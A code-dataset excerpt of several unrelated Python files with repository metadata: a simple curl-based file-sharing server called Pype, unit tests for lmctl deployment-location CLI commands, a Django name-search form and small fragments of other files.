img_name = os.path.join(self.root_dir, self.pics_list[idx])
target = 0 if "cat" in self.pics_list[idx] else 1
image = io.imread(img_name)
if self.transform:
image = self.transform(image)
sample = {"image": image, "target": target}
return sample
| 492 | 10 | 103 |
8a9e1907fd42117845c46ac1a624f31b4890f303 | 11,977 | py | Python | pype.py | H4ckd4ddy/Pype | 3e71fbfaa232ec177d5ed24d72f74fc0a9fecb96 | [
"MIT"
] | null | null | null | pype.py | H4ckd4ddy/Pype | 3e71fbfaa232ec177d5ed24d72f74fc0a9fecb96 | [
"MIT"
] | null | null | null | pype.py | H4ckd4ddy/Pype | 3e71fbfaa232ec177d5ed24d72f74fc0a9fecb96 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
###########################################
# #
# "Pype" #
# Simple file sharing server, #
# to upload and download file #
# from CLI #
# #
# Etienne SELLAN #
# 17/10/2018 #
# #
###########################################
import sys
import time
import signal
import threading
from threading import Thread
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import os
import binascii
import shutil
import base64
import math
import hashlib
# SETTINGS BEGIN
settings = {}
settings["url"] = "https://pype.sellan.fr"
settings["listen_address"] = "0.0.0.0"
settings["port"] = 80
settings["directory"] = "/tmp"
settings["delete_limit"] = 24 # hours
settings["cleaning_interval"] = 1 # hours
settings["id_length"] = 2 # bytes
settings["max_name_length"] = 64 # chars
settings["max_file_size"] = (10*1000*1000*1000) # bytes
# SETTINGS END
if __name__ == "__main__":
server = Thread(target=run_on, args=[int(settings["port"])])
server.daemon = True
server.start()
initialisation()
# Launch auto cleaning interval
set_interval(clean_files, (int(settings["cleaning_interval"]) * 3600))
signal.pause()
| 41.442907 | 165 | 0.56859 | #!/usr/bin/env python3
###########################################
# #
# "Pype" #
# Simple file sharing server, #
# to upload and download file #
# from CLI #
# #
# Etienne SELLAN #
# 17/10/2018 #
# #
###########################################
import sys
import time
import signal
import threading
from threading import Thread
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import os
import binascii
import shutil
import base64
import math
import hashlib
# SETTINGS BEGIN
settings = {}
settings["url"] = "https://pype.sellan.fr"
settings["listen_address"] = "0.0.0.0"
settings["port"] = 80
settings["directory"] = "/tmp"
settings["delete_limit"] = 24 # hours
settings["cleaning_interval"] = 1 # hours
settings["id_length"] = 2 # bytes
settings["max_name_length"] = 64 # chars
settings["max_file_size"] = (10*1000*1000*1000) # bytes
# SETTINGS END
def settings_initialisation():
for setting in settings:
# Take environment settings if defined
if ("pype_"+setting) in os.environ:
settings[setting] = os.environ[("pype_"+setting)]
settings["current_directory"] = os.path.dirname(os.path.realpath(__file__))
def path_to_array(path):
# Split path
path_array = path.split('/')
# Remove empty elements
path_array = [element for element in path_array if element]
return path_array
def array_to_path(path_array):
# Join array
path = '/' + '/'.join(path_array)
return path
def path_initialisation():
global directory
directory = path_to_array(settings["directory"])
directory.append("pype")
# Create directory for Pype if not exist
if not os.path.exists(array_to_path(directory)):
os.makedirs(array_to_path(directory), 666)
def initialisation():
settings_initialisation()
path_initialisation()
class request_handler(BaseHTTPRequestHandler):
def do_GET(self): # For home page and download
# Check for options
if '?' in self.path:
# Split options of request
self.option = self.path.split('?')[1]
self.request_path = self.path.split('?')[0]
else:
# No options
self.option = None
self.request_path = self.path
path_digest = hashlib.sha512(self.request_path.encode('utf-8')).hexdigest()
# Convert path of request to array for easy manipulation
self.request_path = path_to_array(self.request_path)
# Construct full path of the file
self.file_path = directory+[path_digest]
if len(self.request_path) > 0:
if self.request_path[0] == "help":
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
with open(settings["current_directory"]+'/'+'help.txt', 'r') as help_file:
self.wfile.write(str.encode(help_file.read().replace("[url]", settings["url"])+"\n"))
elif self.request_path[0] == "install":
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
with open(settings["current_directory"]+'/'+'alias.sh', 'r') as alias_file:
self.wfile.write(str.encode(alias_file.read().replace("[url]", settings["url"])+"\n"))
elif self.request_path[0] == "Github-ribbon.png":
with open(settings["current_directory"]+'/'+'Github-ribbon.png', 'rb') as image:
self.send_response(200)
self.send_header('Content-type', 'image/png')
self.end_headers()
self.wfile.write(image.read())
elif os.path.exists(array_to_path(self.file_path)):
with open(array_to_path(self.file_path), 'rb') as self.file:
# Load file stats
self.file.stat = os.fstat(self.file.fileno())
if self.option == "info":
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.response = "Name: {}\nSize: {}\nCountdown: {} \n"
self.file.countdown = round(((int(settings["delete_limit"]) * 3600) + self.file.stat.st_ctime) - time.time())
# Place data in response
self.response = self.response.format(self.request_path[-1], human_readable(self.file.stat.st_size), human_readable_time(self.file.countdown))
# Send response
self.wfile.write(str.encode(self.response))
else:
self.send_response(200)
self.send_header("Content-Type", 'application/octet-stream')
contentDisposition = 'attachment; filename="{}"'
contentDisposition = contentDisposition.format(self.request_path[-1])
self.send_header("Content-Disposition", contentDisposition)
self.send_header("Content-Length", str(self.file.stat.st_size))
self.end_headers()
shutil.copyfileobj(self.file, self.wfile)
# If user want deleted file after download
if self.option == "delete":
os.remove(array_to_path(self.file_path))
print("{} deleted !\n".format(array_to_path(self.file_path)))
else:
self.send_response(404)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.response = "File not found \n"
self.wfile.write(str.encode(self.response))
else:
if "curl" in self.headers['User-Agent'].lower():
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
with open(settings["current_directory"]+'/'+'help.txt', 'r') as help_file:
self.wfile.write(str.encode(help_file.read().replace("[url]", settings["url"])+"\n"))
else:
# Open HTML homepage file
with open(settings["current_directory"]+'/'+'index.html', 'r') as homepage:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
# Send HTML page with replaced data
self.wfile.write(str.encode(homepage.read().replace("[url]", settings["url"])))
return
def do_PUT(self): # For upload
# Get the request size in header
self.file_size = int(self.headers['Content-Length'])
self.file_name = self.path.split("/")[-1] # Only take the file name
if len(self.file_name) > int(settings["max_name_length"]): # Check file name length
self.send_response(400) # Send error header
self.send_header('Content-type', 'text/plain') # Send mime
self.end_headers() # Close header
HTML_error = "Error: Too long file name (max {} chars)\n"
HTML_error = HTML_error.format(settings["max_name_length"])
self.wfile.write(str.encode(HTML_error)) # Return error
return
if self.file_size > int(settings["max_file_size"]): # Check file size
self.send_response(400) # Send error header
self.send_header('Content-type', 'text/plain') # Send mime
self.end_headers() # Close header
HTML_error = "Error: Too big file (max {})\n"
HTML_error = HTML_error.format(human_readable(int(settings["max_file_size"])))
self.wfile.write(str.encode(HTML_error)) # Return error
return
# Read content from request
content = self.rfile.read(self.file_size)
# Loop for generating uniq token
while "Bad token":
# Get random token from urandom
random_token = binascii.hexlify(os.urandom(int(settings["id_length"]))).decode()
# If directory not exist -> token free
path_digest = hashlib.sha512(('/'+random_token+'/'+self.file_name).encode('utf-8')).hexdigest()
if not os.path.isfile(array_to_path(directory+[path_digest])):
break
# Concat the new file full path
self.file_path = directory+[path_digest]
# Open tmp new file to write binary data
current_file = open(array_to_path(self.file_path), "wb")
# Write content of request
current_file.write(content)
current_file.close()
self.send_response(200) # Send success header
self.send_header('Content-type', 'text/html') # Send mime
self.end_headers() # Close header
# Return new file url to user
self.wfile.write(str.encode(settings["url"]+"/"+random_token+"/"+self.file_name+"\n"))
return
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
pass
def run_on(port):
print("\n")
print("/-------------------------------\\")
print("| Starting Pype on port {} |".format(str(settings["port"]).rjust(5, " ")))
print("\\-------------------------------/")
print("\n")
print("Reminder : \n")
print("To upload : curl -T file.txt {}".format(settings["url"]))
print("To download : curl {}/[id]/file.txt > files.txt".format(settings["url"]))
print("\n\nLogs : \n")
server_address = (settings["listen_address"], int(settings["port"]))
httpd = ThreadedHTTPServer(server_address, request_handler)
httpd.serve_forever()
def human_readable(bytes): # Convert bytes to human readable string format
units = ['o', 'Ko', 'Mo', 'Go', 'To', 'Po']
cursor = 0
while bytes > 1024:
bytes /= 1024
cursor += 1
value = str(bytes).split('.')
value[1] = value[1][:2]
value = '.'.join(value)
return value+' '+units[cursor]
def human_readable_time(seconds): # Convert time in seconds to human readable string format
units = ['second', 'minute', 'hour', 'day', 'week', 'month', 'year']
maximum_values = [60, 60, 24, 7, 4, 12, 99]
cursor = 0
while seconds > maximum_values[cursor]:
seconds /= maximum_values[cursor]
cursor += 1
value = math.ceil(seconds)
unit = units[cursor]
if float(value) > 1:
unit += 's'
return str(value)+' '+unit
def set_interval(func, time):
e = threading.Event()
while not e.wait(time):
func()
def clean_files():
# Create list of deleted files
removed = []
now = time.time()
# Compute the limit_date from setings
limit_date = now - (int(settings["delete_limit"]) * 3600)
for file in os.listdir(array_to_path(directory)):
if os.path.isfile(array_to_path(directory+[file])):
# Get informations about this file
stats = os.stat(array_to_path(directory+[file]))
timestamp = stats.st_ctime
if timestamp < limit_date:
removed.append(file)
os.remove(array_to_path(directory+[file]))
if len(removed) > 0:
print("Files removed : {}".format(', '.join(removed)))
if __name__ == "__main__":
server = Thread(target=run_on, args=[int(settings["port"])])
server.daemon = True
server.start()
initialisation()
# Launch auto cleaning interval
set_interval(clean_files, (int(settings["cleaning_interval"]) * 3600))
signal.pause()
| 10,114 | 66 | 329 |
ac6da38df846f52bb1d9bf88f1cf9e03dcfbad23 | 40 | py | Python | website/addons/googledrive/views/__init__.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | null | null | null | website/addons/googledrive/views/__init__.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | 1 | 2019-08-16T13:45:12.000Z | 2019-08-16T13:45:12.000Z | website/addons/googledrive/views/__init__.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | null | null | null | from .import hgrid, auth, config # noqa | 40 | 40 | 0.725 | from .import hgrid, auth, config # noqa | 0 | 0 | 0 |
07cf3ba334257d1613f71f2f937520edea323681 | 23,134 | py | Python | tests/unit/cli/commands/test_deployment_location.py | rajahaidar/lmctl | 48984047d3656eca51a382bdfb936304cf48d5aa | [
"Apache-2.0"
] | null | null | null | tests/unit/cli/commands/test_deployment_location.py | rajahaidar/lmctl | 48984047d3656eca51a382bdfb936304cf48d5aa | [
"Apache-2.0"
] | null | null | null | tests/unit/cli/commands/test_deployment_location.py | rajahaidar/lmctl | 48984047d3656eca51a382bdfb936304cf48d5aa | [
"Apache-2.0"
] | null | null | null | import tests.unit.cli.commands.command_testing as command_testing
import lmctl.drivers.lm.base as lm_drivers
import lmctl.cli.commands.deployment_location as deployment_cmds
import tempfile
import shutil
import os
import json
import yaml
from unittest.mock import patch
from tests.common.simulations.lm_simulator import LmSimulator
| 63.554945 | 214 | 0.595963 | import tests.unit.cli.commands.command_testing as command_testing
import lmctl.drivers.lm.base as lm_drivers
import lmctl.cli.commands.deployment_location as deployment_cmds
import tempfile
import shutil
import os
import json
import yaml
from unittest.mock import patch
from tests.common.simulations.lm_simulator import LmSimulator
class TestDeploymentLocationCommands(command_testing.CommandTestCase):
def setUp(self):
super().setUp()
# Created simulated LM session when requested
self.lm_sim = LmSimulator().start()
create_lm_session_patcher = patch('lmctl.cli.ctlmgmt.create_lm_session')
self.mock_create_lm_session = create_lm_session_patcher.start()
self.mock_create_lm_session.return_value = self.lm_sim.as_mocked_session()
self.addCleanup(create_lm_session_patcher.stop)
self.lm_sim.add_rm({'name': 'rm123'})
def test_add_with_defaults(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.add_location.assert_called_once_with({'name': 'testdl', 'description': None, 'resourceManager': 'rm123', 'infrastructureType': None, 'infrastructureSpecificProperties': {}})
def test_add_with_params(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '-i', 'Openstack', '-d', 'test location'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | Openstack | test location |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.add_location.assert_called_once_with({'name': 'testdl', 'description': 'test location', 'resourceManager': 'rm123', 'infrastructureType': 'Openstack', 'infrastructureSpecificProperties': {}})
def test_add_with_json_properties(self):
tmp_dir = tempfile.mkdtemp()
try:
properties_dict = {
'propA': 'valueA'
}
properties_file = os.path.join(tmp_dir, 'props.json')
with open(properties_file, 'w') as f:
json.dump(properties_dict, f)
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '-p', properties_file])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.add_location.assert_called_once_with({'name': 'testdl', 'description': None, 'resourceManager': 'rm123', 'infrastructureType': None, 'infrastructureSpecificProperties': properties_dict})
finally:
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
def test_add_with_yaml_properties(self):
tmp_dir = tempfile.mkdtemp()
try:
properties_dict = {
'propA': 'valueA'
}
properties_file = os.path.join(tmp_dir, 'props.yaml')
with open(properties_file, 'w') as f:
yaml.dump(properties_dict, f)
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '-p', properties_file])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.add_location.assert_called_once_with({'name': 'testdl', 'description': None, 'resourceManager': 'rm123', 'infrastructureType': None, 'infrastructureSpecificProperties': properties_dict})
finally:
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
def test_add_with_config(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '--config', 'my/config/file'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, 'my/config/file')
def test_add_with_pwd(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '--pwd', 'secret'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', 'secret', None)
def test_add_with_output_json_format(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '-f', 'json'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '{'
expected_output += '\n \"name\": \"testdl\",'
expected_output += '\n \"description\": null,'
expected_output += '\n \"resourceManager\": \"rm123\",'
expected_output += '\n \"infrastructureType\": null,'
expected_output += '\n \"infrastructureSpecificProperties\": {},'
expected_output += '\n \"id\": \"{0}\"'.format(expected_id)
expected_output += '\n}'
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
def test_add_with_output_yaml_format(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '-f', 'yaml'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = 'name: testdl'
expected_output += '\ndescription: null'
expected_output += '\nresourceManager: rm123'
expected_output += '\ninfrastructureType: null'
expected_output += '\ninfrastructureSpecificProperties: {}'
expected_output += '\nid: {0}\n'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
def test_add_handles_lm_driver_error(self):
self.mock_create_lm_session.return_value.deployment_location_driver.add_location.side_effect = lm_drivers.LmDriverException('Mocked error')
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123'])
self.assert_has_system_exit(result)
expected_output = 'LM error occurred: Mocked error'
self.assert_output(result, expected_output)
def test_delete_with_defaults(self):
dl_id = '123'
dl_name = 'abc'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.delete, ['TestEnv', dl_name])
self.assert_no_errors(result)
expected_output = 'Deleting deployment location: {0}...'.format(dl_id)
expected_output += '\nDeleted deployment location: {0}'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.get_locations_by_name.assert_called_once_with(dl_name)
mock_dl_driver.delete_location.assert_called_once_with(dl_id)
def test_delete_with_config(self):
dl_id = '123'
dl_name = 'abc'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.delete, ['TestEnv', dl_name, '--config', 'my/config/file'])
self.assert_no_errors(result)
expected_output = 'Deleting deployment location: {0}...'.format(dl_id)
expected_output += '\nDeleted deployment location: {0}'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, 'my/config/file')
def test_delete_with_pwd(self):
dl_id = '123'
dl_name = 'abc'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.delete, ['TestEnv', dl_name, '--pwd', 'secret'])
self.assert_no_errors(result)
expected_output = 'Deleting deployment location: {0}...'.format(dl_id)
expected_output += '\nDeleted deployment location: {0}'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', 'secret', None)
def test_delete_handles_lm_driver_error(self):
result = self.runner.invoke(deployment_cmds.delete, ['TestEnv', 'SomeDl'])
self.assert_has_system_exit(result)
expected_output = 'Error: No deployment location with name: SomeDl'
self.assert_output(result, expected_output)
def test_get_with_defaults(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.get, ['TestEnv', dl_name])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.get_locations_by_name.assert_called_once_with(dl_name)
def test_get_with_config(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.get, ['TestEnv', dl_name, '--config', 'my/config/file'])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, 'my/config/file')
def test_get_with_pwd(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.get, ['TestEnv', dl_name, '--pwd', 'secret'])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', 'secret', None)
def test_get_not_found(self):
result = self.runner.invoke(deployment_cmds.get, ['TestEnv', 'SomeDl'])
self.assert_has_system_exit(result)
expected_output = 'Error: No deployment location with name: SomeDl'
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
def test_get_with_output_json_format(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.get, ['TestEnv', dl_name, '-f', 'json'])
self.assert_no_errors(result)
expected_output = '{'
expected_output += '\n \"id\": \"{0}\",'.format(dl_id)
expected_output += '\n \"name\": \"{0}\",'.format(dl_name)
expected_output += '\n \"resourceManager\": \"rm123\"'
expected_output += '\n}'
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
def test_get_with_output_yaml_format(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.get, ['TestEnv', dl_name, '-f', 'yaml'])
self.assert_no_errors(result)
expected_output = 'id: {0}'.format(dl_id)
expected_output += '\nname: {0}'.format(dl_name)
expected_output += '\nresourceManager: rm123\n'
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
def test_list_with_defaults(self):
dl_A_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_A_name = 'testdl_a'
self.lm_sim.add_deployment_location({'id': dl_A_id, 'name': dl_A_name, 'resourceManager': 'rm123'})
dl_B_id = 'c502bc73-6278-42e0-a5e3-a0fe40674754'
dl_B_name = 'testdl_b'
self.lm_sim.add_deployment_location({'id': dl_B_id, 'name': dl_B_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.list_locations, ['TestEnv'])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+----------+-------------------+----------------------+---------------|'
expected_output += '\n| f801fa73-6278-42f0-b5d3-a0fe40675327 | testdl_a | rm123 | | |'
expected_output += '\n| c502bc73-6278-42e0-a5e3-a0fe40674754 | testdl_b | rm123 | | |'
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.get_locations.assert_called_once()
def test_list_with_config(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.list_locations, ['TestEnv', '--config', 'my/config/file'])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, 'my/config/file')
def test_get_with_pwd(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.list_locations, ['TestEnv', '--pwd', 'secret'])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', 'secret', None)
def test_list_with_output_json_format(self):
dl_A_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_A_name = 'testdl_a'
self.lm_sim.add_deployment_location({'id': dl_A_id, 'name': dl_A_name, 'resourceManager': 'rm123'})
dl_B_id = 'c502bc73-6278-42e0-a5e3-a0fe40674754'
dl_B_name = 'testdl_b'
self.lm_sim.add_deployment_location({'id': dl_B_id, 'name': dl_B_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.list_locations, ['TestEnv', '-f', 'json'])
self.assert_no_errors(result)
expected_output = '{'
expected_output += '\n \"items\": ['
expected_output += '\n {'
expected_output += '\n \"id\": \"{0}\",'.format(dl_A_id)
expected_output += '\n \"name\": \"{0}\",'.format(dl_A_name)
expected_output += '\n \"resourceManager\": \"rm123\"'
expected_output += '\n },'
expected_output += '\n {'
expected_output += '\n \"id\": \"{0}\",'.format(dl_B_id)
expected_output += '\n \"name\": \"{0}\",'.format(dl_B_name)
expected_output += '\n \"resourceManager\": \"rm123\"'
expected_output += '\n }'
expected_output += '\n ]'
expected_output += '\n}'
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
def test_list_with_output_yaml_format(self):
dl_A_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_A_name = 'testdl_a'
self.lm_sim.add_deployment_location({'id': dl_A_id, 'name': dl_A_name, 'resourceManager': 'rm123'})
dl_B_id = 'c502bc73-6278-42e0-a5e3-a0fe40674754'
dl_B_name = 'testdl_b'
self.lm_sim.add_deployment_location({'id': dl_B_id, 'name': dl_B_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.list_locations, ['TestEnv', '-f', 'yaml'])
self.assert_no_errors(result)
expected_output = 'items:'
expected_output += '\n- id: {0}'.format(dl_A_id)
expected_output += '\n name: {0}'.format(dl_A_name)
expected_output += '\n resourceManager: rm123'
expected_output += '\n- id: {0}'.format(dl_B_id)
expected_output += '\n name: {0}'.format(dl_B_name)
expected_output += '\n resourceManager: rm123\n'
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
| 22,031 | 49 | 722 |
9b16e57ad078ac3dd34deccb16011dfd3b9e10f0 | 233 | py | Python | apps/jamendo/forms.py | matagus/django-jamendo | 9004562fdae9d438048c6c11463113337ed874b7 | [
"BSD-3-Clause"
] | 2 | 2015-11-05T11:54:20.000Z | 2016-06-18T05:23:34.000Z | apps/jamendo/forms.py | matagus/django-jamendo | 9004562fdae9d438048c6c11463113337ed874b7 | [
"BSD-3-Clause"
] | null | null | null | apps/jamendo/forms.py | matagus/django-jamendo | 9004562fdae9d438048c6c11463113337ed874b7 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django import forms
from django.utils.translation import ugettext_lazy as _
| 25.888889 | 69 | 0.733906 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django import forms
from django.utils.translation import ugettext_lazy as _
class NameSearchForm(forms.Form):
name = forms.CharField(required=False, label=_("Search by name")) | 0 | 82 | 23 |
a156e14fef8865b6948d7cc1e4b5349074a71978 | 17,042 | py | Python | xgds_core/importer/validate_timestamps.py | xgds/xgds_core | 7c2f8d56ca56321f6a9331cda38b40b503fade04 | [
"Apache-2.0"
] | 1 | 2019-02-13T21:02:18.000Z | 2019-02-13T21:02:18.000Z | xgds_core/importer/validate_timestamps.py | xgds/xgds_core | 7c2f8d56ca56321f6a9331cda38b40b503fade04 | [
"Apache-2.0"
] | 2 | 2020-07-16T02:51:17.000Z | 2021-05-06T23:34:15.000Z | xgds_core/importer/validate_timestamps.py | xgds/xgds_core | 7c2f8d56ca56321f6a9331cda38b40b503fade04 | [
"Apache-2.0"
] | 1 | 2017-10-04T18:15:16.000Z | 2017-10-04T18:15:16.000Z | #!/usr/bin/env python
# __BEGIN_LICENSE__
# Copyright (c) 2015, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The xGDS platform is licensed under the Apache License, Version 2.0
